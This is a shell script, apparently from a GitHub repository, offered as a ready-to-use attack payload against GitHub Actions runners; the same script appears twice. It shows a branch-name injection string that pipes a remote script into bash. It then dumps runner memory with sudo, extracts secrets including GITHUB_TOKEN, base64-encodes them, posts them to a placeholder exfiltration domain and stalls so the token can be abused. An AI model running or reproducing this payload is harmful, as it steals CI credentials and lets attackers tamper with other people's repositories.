AkshayJainG/payload.sh

## payload.sh
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"

# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'

# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  # Print to run log
  echo $B64_BLOB
  # Exfil to Burp
  curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
  # Sleep for 15 mins to abuse GITHUB_TOKEN
  sleep 900
else
  exit 0
fi
	# Replace with Burp collaborator domain or similar.
	YOUR_EXFIL="https://your-exfil-domain.com"

	# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}\|${IFS}bash'

	# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
	if [[ "$OSTYPE" == "linux-gnu" ]]; then
	B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py \| sudo python3 \| tr -d '\0' \| grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' \| sort -u \| base64 -w 0 \| base64 -w 0`
	# Print to run log
	echo $B64_BLOB
	# Exfil to Burp
	curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
	# Sleep for 15 mins to abuse GITHUB_TOKEN
	sleep 900
	else
	exit 0
	fi